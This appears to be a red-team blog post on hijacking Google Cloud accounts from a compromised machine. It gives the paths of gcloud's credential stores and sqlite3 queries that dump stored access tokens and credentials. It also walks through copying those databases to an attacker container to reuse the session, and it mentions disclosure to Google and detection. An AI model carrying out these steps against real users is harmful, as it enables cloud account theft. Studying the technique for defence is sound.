Compromised Endpoint to Compromised GCP : Gone in 60 Seconds

In this article, we will discuss how you can take over google cloud accounts, if you have compromised an endpoint. Once you get a hang of it, it will take you less than 60 seconds to do this.

A gcloud story

If you are familiar with google cloud, you might be familiar with gcloud as well. It is a very powerful command line tool that pretty much lets you do everything. gcloud ( and gsutil in some cases ) to google cloud is like powershell to windows.

MacOS : /Users/<username>/.config/gcloud/
Linux : /home/<username>/.config/gcloud/
Windows : C:\Users\<username>\AppData\Roaming\gcloud\
$ cd /home/<username>/.config/gcloud$ sqlite3 access_tokens.db
> select * from access_tokens;
> select account_id, access_token, token_expiry from access_tokens WHERE account_id=redteam-operator-1@redteam.com;$ sqlite3 credentials.db
> select * from credentials;
> select account_id, value from credentials WHERE account_id=redteam-operator-1@redteam.com;

The Proof of Concept

Now that we have learned some basics, let’s see how we can (ab)use this to our advantage.

Victim

We will authenticate using victim container. Then we will transfer these databases from victim to attacker to simulate exfil.

# root@<victim-container>:/# gcloud auth login --no-launch-browser# root@<victim-container>:/# gcloud projects list

Attacker

Once successfully authenticated in victim container , copy access_tokens.db and credentials.db into attacker container.

# root@<attacker-container>:/# gcloud auth list# root@<attacker-container>:/# gcloud config set account redteam-operator-1@redteam.com# root@<attacker-container>:/# gcloud projects list

Consideration During Red Team Op

If you run into user who has multiple account_ids in the database, you would want to pick the account for which access token has not expired. You can use SQLite queries shown below to find out account token that has not expired.

Clear Text SQLite DB

Responsible Disclosure

This issue was reported to google and they were asked to at least encrypt databases on disk as a solution to put more obstacles in the path of the attacker. But they have decided to not pursue it as a security bug.

In Conclusion

This is a very dangerous technique that can cause some heavy damage. There is no prevention currently available that can stop this. Our best bet is to detect this.

Effective collaboration between red and blue can produce offensive defense a.k.a blue team quickly detecting, responding and disrupting attackers activities.